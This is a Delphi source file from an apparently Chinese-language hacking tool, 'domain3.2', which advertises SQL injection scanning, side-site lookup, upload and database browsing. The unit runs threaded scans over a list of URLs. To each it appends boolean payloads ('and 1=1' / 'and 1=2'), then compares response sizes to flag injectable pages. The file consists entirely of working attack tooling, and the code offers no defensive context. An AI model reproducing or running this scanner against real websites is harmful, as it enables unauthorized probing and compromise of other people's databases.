webscaninject.pas

domain3.2 SQL注入漏洞扫描 旁注 上传功能 数据库浏览

unit WebScaninject;

interface

uses
  Classes, StdCtrls, Wininet, GetHttpSize, Windows, SysUtils, ComCtrls, Dialogs,
  RzlstBox, Shellapi;

type
  WebThject = class(TThread)
  private
    Num: integer;
    ThreadCount: integer;
    ifor: integer;
    TempLsb, ResultLsb: TRzListBox;
    procedure UpdataMemo;
  protected
    procedure Execute; override;
  public
    constructor Create(ReadLsb, SaveLib: TRzListBox; T_Num, ThCount: integer);
  end;

implementation

uses MainUnit;

constructor WebThject.Create(ReadLsb, SaveLib: TRzListBox; T_Num, ThCount: integer);
begin
  Num := T_Num; {传递的值}
  ThreadCount := ThCount; {线程的数量}
  TempLsb := ReadLsb; {从TMemo读出连接地址进行扫描}
  ResultLsb := SaveLib; {将结果保存到ResultLsb}
  FreeOnTerminate := True; {自动删除}
  inherited create(False); {直接运行}
end;

procedure WebThject.UpdataMemo;
begin
  ResultLsb.items.add('发现注入点: ' + TempLsb.Items[ifor]);
  ResultLsb.Refresh;
end;

procedure WebThject.Execute;
var
  and1, and2, i: integer;
  AVG, LinkCount: integer;
begin

  LinkCount := TempLsb.Items.Count; {连接地址的数量}

  if TempLsb.Items.Count >= 25 then
    LinkCount := 25
  else
    LinkCount := TempLsb.Items.Count;

  { LinkCount = 连接地址的数量  ThreadCount = 线程的数量 }

  {用连接地址的数量除以线程的数量,得到他们的平均值}

  if (LinkCount mod ThreadCount) > 0 then
    AVG := LinkCount div ThreadCount + 1
  else
    AVG := LinkCount div ThreadCount;

  for i := ((Num * AVG) - AVG) to ((Num * AVG) - 1) do {线程分块检测}
  begin

    if Terminated then Exit;

    if i >= 20 then Exit;

    try

      ifor := i;
      and1 := Get_HttpSize(TempLsb.Items[i] + '%20and%201=1', 20000);
      and2 := Get_HttpSize(TempLsb.Items[i] + '%20and%201=2', 20000);
      if Terminated then Exit;
      if and1 > and2 then
      begin
        Synchronize(UpdataMemo);
      end;

    except
    end;
    sleep(50);
  end;

end;

end.